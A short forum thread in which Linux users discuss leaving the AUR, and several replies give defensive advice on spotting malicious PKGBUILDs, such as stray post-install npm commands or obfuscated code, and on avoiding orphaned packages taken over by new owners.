I wants to get free of AUR packages, but I am using TurboPrint, that use gtk2 from AUR.
I am thinking about changing to OpenSuse, but can this Hyprland run on OpenSuse?
Just make sure to review the PKGBUILD before installing and if you don’t see anything wrong you should be fine. Assuming you trust the repository that it’s building from.
This attack is nothing new. The AUR has always been the Wild West… it’s just that with so many new users coming from windows, it’s a bigger attack surface than it used to be, and more publicly visible.
The PKGBUILD is nothing more than a bash script that retrieves a file or a source repo, then either extracts and packages the files contents, or builds and packages the repo.
You can literally just run the commands from it in your terminal and achieve the same thing.
Mostly what you want to look out for with this current wave of amateurish attacks is weird post install commands that have nothing to do with what you’re trying to install.
If a program written in say C, has npm install <random package name> then it’s probably bad., because JavaScript != C.
Same goes for yarn or bun or any other js package manager.
And if you see obfuscated ANYTHING it is a guarantee it is bad.
I take it you didn’t understand that aur attack then.
It’s not that aur was compromised at all.
Some chum simply claimed he was the new owner of old packages that had been marked as obsolete and no longer updated. So the easy fix is, don’t use random software that is marked as obsolete.